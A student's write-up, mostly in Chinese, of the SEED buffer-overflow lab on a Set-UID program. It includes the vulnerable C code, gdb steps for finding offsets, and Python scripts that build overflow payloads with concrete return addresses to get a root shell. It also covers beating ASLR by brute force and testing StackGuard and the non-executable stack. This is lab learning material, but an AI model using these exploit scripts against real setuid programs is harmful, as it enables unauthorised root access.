SeedLab ex4 Buffer Overflow Attack Lab (Set-UID Version)



env setup

  1. 关闭地址空间随机化
sudo sysctl -w kernel.randomize_va_space=0
  1. 配置 /bin/sh,换一个shell
sudo ln -sf /bin/zsh /bin/sh
  1. StackGuard 和 Non-Executable Stack。这是系统中实施的另外两个对策。它们可以在编译时关闭。

Task1: Getting Familiar with Shellcode




#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Binary code for setuid(0)
// 64-bit:  "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05"
// 32-bit:  "\x31\xdb\x31\xc0\xb0\xd5\xcd\x80"

const char shellcode[] =
#if __x86_64__

int main(int argc, char **argv) {
  char code[500];

  strcpy(code, shellcode);
  int (*func)() = (int (*)())code; // 将缓冲区地址强制转换成函数指针

  func(); //调用函数指针执行程序
  return 1;

makefile里的编译 gcc -z execstack -o a64.out call_shellcode.c-z execstack可以在堆栈上执行代码,make后执行代码,在没执行make setuid是提示符是$set,执行后提示符是#,成功获取了root权限。

Task2:Understanding the Vulnerable Program

源代码 程序的BUF_SIZE设定为100,在badfile中读入了517字节数据 调用了dummy_function(),插入了一个1000字节的栈帧(可能是用来模拟正常程序运行是对栈的操作?修改栈的布局),再调用bof(),执行strcpy(buffer, str);插入恶意代码,需要覆盖到返回地址,使程序跳转到非预期的位置,再执行一个打开shell的操作就能获取到set-uid程序为root的root权限的。

编译 编译时要带上-fno-stack-protector-z execstack分别是关闭stackgurad选项和堆栈保护,再执行chown rootchmod 4755操作,4755中的4是set-uid的设定(启用suid,4表示以文件所有者权限运行而不是运行者权限),剩余的三个为所有者,所有者所在组和其他的rwx权限。

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Changing this size will change the layout of the stack.
 * Instructors can change this value each year, so students
 * won't be able to use the solutions from the past.
#ifndef BUF_SIZE
#define BUF_SIZE 100

void dummy_function(char *str);

int bof(char *str) {
  char buffer[BUF_SIZE];

  // The following statement has a buffer overflow problem
  strcpy(buffer, str);

  return 1;

int main(int argc, char **argv) {
  char str[517];
  FILE *badfile;

  // 读入文件
  badfile = fopen("badfile", "r");
  if (!badfile) {
    perror("Opening badfile");

  int length = fread(str, sizeof(char), 517, badfile);
  printf("Input size: %d\n", length);
  dummy_function(str); //将文件内容复制到缓冲区
  fprintf(stdout, "==== Returned Properly ====\n");
  return 1;

// This function is used to insert a stack frame of size
// 1000 (approximately) between main's and bof's stack frames.
// The function itself does not do anything.
void dummy_function(char *str) {
  char dummy_buffer[1000];// 插入了一个栈帧
  memset(dummy_buffer, 0, 1000); 

Task3: Launching Attack on 32-bit Program (Level 1)


  1. offert

执行make,debug L1

  1. gdb stack-L1-dbg打开调试程序
  2. b bof()设置断点
  3. run运行,到达断点
  4. next单步
  5. p $ebp查看ebp寄存器
  6. p $buffer查看buffer地址



  1. 先看ebp基址指针,指针的内容是这个函数基址地址,基址地址里存放的是上一个函数的基址地址,基质地址的上一个字是存放函数返回地址的地址,这个地址就与buffer[0]的距离是offset,offset = ebp+4-buffer[0] 2. 原本的思路是设定一个大于offset的start值,buffer[0]+start的结果地址就是ret的地址,这样参数设定下来跑是能跑通,而且调试里面看过来地址也是对刚好对应上的,但是!在start-offset 到start的区间里也能成功跑通,搞这个搞了3个小时没想明白,战略性放弃一下(奇怪的问题解决了,大概是调试和运行用的地址不是同样的地址,所以运行时打印地址看看
  2. ret的边缘的值为offset+start,这个是刚刚好的位置。start的值和缓冲区大小有一定关系,首先不能和ret存储的位置产生覆盖,然后将shellcode放在ret前面或者后面得看缓冲区


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Changing this size will change the layout of the stack.
 * Instructors can change this value each year, so students
 * won't be able to use the solutions from the past.
#ifndef BUF_SIZE
#define BUF_SIZE 100

void dummy_function(char *str);

int bof(char *str) {
  char buffer[BUF_SIZE];

  // The following statement has a buffer overflow problem
  strcpy(buffer, str);
  printf("buffer_address:%p\n", buffer);
  return 1;

int main(int argc, char **argv) {
  char str[517];
  FILE *badfile;

  badfile = fopen("badfile", "r");
  if (!badfile) {
    perror("Opening badfile");

  int length = fread(str, sizeof(char), 517, badfile);
  printf("Input size: %d\n", length);
  printf("str:%p\n", str);
  fprintf(stdout, "==== Returned Properly ====\n");
  return 1;

// This function is used to insert a stack frame of size
// 1000 (approximately) between main's and bof's stack frames.
// The function itself does not do anything.
void dummy_function(char *str) {
  char dummy_buffer[1000];
  memset(dummy_buffer, 0, 1000);


import sys

# Replace the content with the actual shellcode
shellcode = (

# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))

# Put the shellcode somewhere in the payload
start = 255             # Change this number
content[start:start + len(shellcode)] = shellcode

# Decide the return address value
# and put it somewhere in the payload
ret = 0xffffca4c+start           # Change this number
offset = 112              # Change this number

L = 4     # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L, byteorder='little')

# Write the content to a file
with open('badfile', 'wb') as f:

Task4: Launching Attack without Knowing Buffer Size (Level 2)


import sys

# Replace the content with the actual shellcode
shellcode = (

# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))

# Put the shellcode somewhere in the payload
start = 490             # Change this number ,517 - len(shell_code)
content[start:start + len(shellcode)] = shellcode

# Decide the return address value
# and put it somewhere in the payload
ret = 0xffffca58+8+200           # Change this number

L = 4     # Use 4 for 32-bit address and 8 for 64-bit address
for offset in range(100, 204, 4):
    content[offset:offset + 4] = (ret).to_bytes(L, byteorder='little')

# Write the content to a file
with open('badfile', 'wb') as f:

Task 5: Launching Attack on 64-bit Program (Level 3)


import sys

# Replace the content with the actual shellcode
shellcode = (

# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))

# Put the shellcode somewhere in the payload
start = 0             # Change this number
content[start:start + len(shellcode)] = shellcode

# Decide the return address value
# and put it somewhere in the payload
ret = 0x00007fffffffd830+start           # Change this number buffer[0]+start
offset = 216              # Change this number rbp - offset[0]+8

L = 8     # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L, byteorder='little')

# Write the content to a file
with open('badfile', 'wb') as f:

Task 6: Launching Attack on 64-bit Program (Level 4)


import sys

# Replace the content with the actual shellcode
shellcode = (

# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))

# Put the shellcode somewhere in the payload
start = 26             # Change this number
content[start:start + len(shellcode)] = shellcode

# Decide the return address value
# and put it somewhere in the payload
ret = 0x00007fffffffdd30+start           # Change this number buffer[0]+start
offset = 18             # Change this number rbp - offset[0]+8

L = 8     # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L, byteorder='little')

# Write the content to a file
with open('badfile', 'wb') as f:

Tasks 7: Defeating dash’s Countermeasure

先把shell弄回来,在原本的dash里检测到有效用户effective uid不等于真实用户real uid是会减低权限。之前通过软连接link到另一个shell,现在重新链接回来指向dash

sudo ln -sf /bin/dash /bin/sh


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// Binary code for setuid(0)
// 64-bit:  "\x48\x31\xff\x48\x31\xc0\xb0\x69\x0f\x05"
// 32-bit:  "\x31\xdb\x31\xc0\xb0\xd5\xcd\x80"

const char shellcode[] =
#if __x86_64__

int main(int argc, char **argv) {
  char code[500];

  strcpy(code, shellcode);
  int (*func)() = (int (*)())code; // 将缓冲区地址强制转换成函数指针

  func(); //调用函数指针执行程序
  return 1;

Task 8: Defeating Address Randomization


sudo /sbin/sysctl -w kernel.randomize_va_space=2


while true; do
value=$(( $value + 1 ))
min=$(($duration / 60))
sec=$(($duration % 60))
echo "$min minutes and $sec seconds elapsed."
echo "The program has been running $value times so far."


sudo bash

Tasks 9: Experimenting with Other Countermeasures

Task 9.a: Turn on the StackGuard Protection

关闭地址随机化,重试L1,确保实验成功,去除编译flags里的-fno-stack-protector,这是用来保护对堆栈溢出的,如果要修改返回地址那就一定会产生堆栈溢出 FLAGS = -z execstack ~~-fno-stack-protector~~

sudo /sbin/sysctl -w kernel.randomize_va_space=0


*** stack smashing detected ***: terminated

Task 9.b: Turn on the Non-executable Stack Protection

删除编译文件中的堆栈可执行flag -z execstack,重新编译执行查看结果,结果就是segmentation fault